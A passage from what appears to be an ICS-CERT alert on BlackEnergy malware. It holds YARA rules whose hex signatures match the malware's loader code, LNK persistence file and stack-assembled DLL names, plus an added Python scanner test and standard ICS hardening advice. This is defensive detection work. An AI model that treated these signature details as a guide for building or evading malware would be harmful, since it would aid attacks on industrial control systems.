00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00** **69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00** **6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00** **6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00** **77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00** **31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00** **61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00** **6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00** **6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00** **6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00** **40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00** **00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00** **64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00** **73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00** **42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00** **2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00** **61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00** **73 00 6C 00 61 00 74 00 69 
00 6F 00 6E 00 00 00 00 00 09 04 B0 04}** **$b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69** **00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E** **00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70** **00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13** **00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70** **00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00** **01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00** **73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 72 00** **61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00** **6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 
35 00 2E 00 31 00 2E 00 32 00 36 00** **30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00** **6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00** **00 00 00 00 09 04 E4 04}** **condition:** **(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and** **(uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in (uint32(uint32(0x3C)+248+(40*** **(uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-** **1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16)))))))** **}** **rule BlackEnergy2_USBInfected** **//ICS-CERT rule to detect .exe's infected by BlackEnergy JN plugin for JN versions 7 (full), 75 (light)** **//version 1** **{** **strings:** **$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B** **C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56** **57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68 00 00 00 40 53 FF 57 14 53 8B 4F 4C** **8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18}** **$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 33** **C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08** **D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC}** **$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 4D** **5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00** ----- **condition:** **$a1 at entrypoint or any of ($f*)** **}** **rule BlackEnergy3** **//ICS-CERT rule to detect BlackEnergy3 versions 1.1.0 through 1.2.5** **//version 1** **{** **strings:** **//elements from the .LNK 
```yara
        //file created for persistence
        $l1 = {72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 1C 00 00 00
               2C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 57 00 49 00 4E
               00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 72 00 75 00 6E 00 64 00 6C
               00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 13 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C
               00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 22 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65
               00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64
               00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 20 00 53
               00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E
               00 20 00 44 00 61 00 74 00 61 00 5C}
        //resource from loader file
        $r1 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00
               4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00
               00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00
               6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00
               34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00
               00 00 4D 00 69 00 63 00 72 00 6F 00 00 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00
               69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00
               69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00
               6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00
               6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00
               77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00
               31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00
               61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00
               6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00
               6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00
               6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00
               40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
               00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00
               64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00
               73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00
               42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 00 00 00 00 35 00
               2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00
               61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00
               73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}
        //sections of code from loader
        $sa1 = {55 8B EC 83 EC 24 53 56 57 C7 45 F8 00 00 00 00 C7 45 F4 64 00 00 00 83 EC 10 C7 45 EC
                5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00 6A 01 8D 45 E0 50 E8 2F FC FF FF 89
                45 FC 8B 4D FC 89}
    condition:
        any of them
}

rule BlackEnergy_findFunc
//ICS-CERT rule to detect BlackEnergy2 "light" and BlackEnergy3. Will not detect BE2 sys variant.
//version 1
{
    strings:
        $sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C} //ws2_32.dll
        $sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C} //user32.dll
        $sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C} //wininet.dll
        $sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C} //shell32.dll
        $sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C} //psapi.dll
        $sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} //netapi32.dll
        $sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C} //version.dll
        $sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C} //oleaut32.dll
        $sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C} //imagehlp.dll
    condition:
        3 of them
}
```

#### MITIGATIONS

ICS-CERT has published a TLP Amber version of this alert containing additional information about the malware, plug-ins, and indicators to the secure portal. ICS-CERT strongly encourages asset owners and operators to use these indicators to look for signs of compromise within their control systems environments.
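The `$sb` strings of BlackEnergy_findFunc do not look for the DLL names as contiguous text: each one matches a name written four bytes at a time with `mov [mem], imm32` (opcode C7) and two bytes at a time with `mov [mem], imm16` (66 C7), i.e. a string assembled on the stack. The Python below is an added example and not part of the ICS-CERT alert; it translates those hex patterns into byte regexes, recovers the fragments each pattern expects, and applies the rule's `3 of them` condition to constructed buffers (the stack-string encoder, the `ebp`-relative displacements and the sample buffers are assumptions, and `$sb3` is absent from the page so it is omitted here too).

```python
import re
# $sb strings copied from the BlackEnergy_findFunc rule above ($sb3 is not on the page).
SB_PATTERNS = {
    "sb1": "C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C",
    "sb2": "C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C",
    "sb4": "C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C",
    "sb5": "C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C",
    "sb6": "C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C",
    "sb7": "C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C",
    "sb8": "C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C",
    "sb9": "C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C",
    "sb10": "C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C",
}
JUMP = re.compile(r"\[(\d+)-(\d+)\]")  # YARA jump token such as [1-5]

def hex_pattern_to_regex(pattern):
    """Translate a YARA hex string with [n-m] jumps into a compiled bytes regex."""
    parts = []
    for tok in pattern.split():
        m = JUMP.fullmatch(tok)
        parts.append(b".{%d,%d}" % (int(m[1]), int(m[2])) if m else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)

def immediate_fragments(pattern):
    """ASCII chunks the pattern expects as 'mov [mem], imm' operands (C7 = dword store, 66 C7 = word store)."""
    toks, frags, cur = pattern.split(), [], ""
    for i, tok in enumerate(toks):
        opcode = tok == "C7" or (tok == "66" and toks[i + 1:i + 2] == ["C7"])
        if opcode or JUMP.fullmatch(tok):
            frags, cur = frags + ([cur] if cur else []), ""
        else:
            cur += chr(int(tok, 16))
    return frags + ([cur] if cur else [])

def stack_string_stores(fragments, base=0xE0):
    """Constructed encoder (assumption): 'mov [ebp+disp8], imm' stores (C7 45 disp imm32 / 66 C7 45 disp imm16) that build a string on the stack."""
    code = b""
    for i, frag in enumerate(fragments):
        word = len(frag) <= 2
        imm = frag.encode("ascii").ljust(2 if word else 4, b"\0")  # NUL-padded like a compiler would
        code += (b"\x66" if word else b"") + b"\xC7\x45" + bytes([(base + 4 * i) & 0xFF]) + imm
    return code

def scan(data, min_hits=3):
    """Apply the rule's strings and its 'condition: 3 of them' to a byte buffer."""
    hits = sorted(n for n, p in SB_PATTERNS.items() if hex_pattern_to_regex(p).search(data))
    return hits, len(hits) >= min_hits
# Constructed buffers, not malware bytes: names built as stack strings vs. plain contiguous ASCII.
SAMPLE_STACK = b"\x55\x8B\xEC" + b"".join(
    stack_string_stores(immediate_fragments(SB_PATTERNS[n])) for n in ("sb2", "sb4", "sb5")) + b"\xC3"
SAMPLE_PLAIN = b"user32.dll\0wininet.dll\0shell32.dll\0"
```

`scan(SAMPLE_STACK)` reports `sb2`, `sb4` and `sb5` and satisfies the condition, while `scan(SAMPLE_PLAIN)` reports nothing: the same names stored as ordinary strings fall outside what this rule is written to catch, which is why it should be run alongside the string-based rule above rather than instead of it.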
Asset owners and operators can request access to this information by emailing [ics-cert@dhs.gov](mailto:ics-cert@dhs.gov).

Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and correlation.

ICS-CERT strongly encourages taking immediate defensive action to secure ICS systems using defense-in-depth principles (CSSP Recommended Practices, https://ics-cert.us-cert.gov/Recommended-Practices, web site last accessed October 28, 2014). Asset owners should not assume that their control systems are deployed securely or that they are not operating with an Internet-accessible configuration. Instead, asset owners should thoroughly audit their networks for Internet-facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet-accessible devices installed without the owner's knowledge, putting those systems at increased risk of attack.

ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities and unsecure device configurations. Specifically, users should:

- Minimize network exposure for all control system devices. Control system devices should not directly face the Internet.
- Locate control system networks and devices behind firewalls, and isolate them from the business network.
- If remote access is required, employ secure methods, such as Virtual Private Networks (VPNs), recognizing that a VPN is only as secure as the connected devices.
- Remove, disable, or rename any default system accounts wherever possible.
- Apply patches in the ICS environment, when possible, to mitigate known vulnerabilities.
- Implement policies requiring the use of strong passwords.
- Monitor the creation of administrator-level accounts by third-party vendors.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.

ICS-CERT also provides a [recommended practices section for control systems on the ICS-CERT web site](http://ics-cert.us-cert.gov/content/recommended-practices) (http://ics-cert.us-cert.gov). Several recommended practices are available for reading or download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Organizations that observe any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

ICS-CERT encourages US asset owners and operators to join the control systems compartment of the US-CERT secure portal. To request access to the secure portal, send your name, email address, and company affiliation to [ics-cert@hq.dhs.gov](mailto:ics-cert@hq.dhs.gov).

#### Contact Information

For any questions related to this report, please contact ICS-CERT at:

U.S. Toll Free: (877) 776-7585
International: (208) 526-0900
Email: ics-cert@hq.dhs.gov

For industrial control systems security information and incident reporting: [http://ics-cert.us-cert.gov](http://ics-cert.us-cert.gov)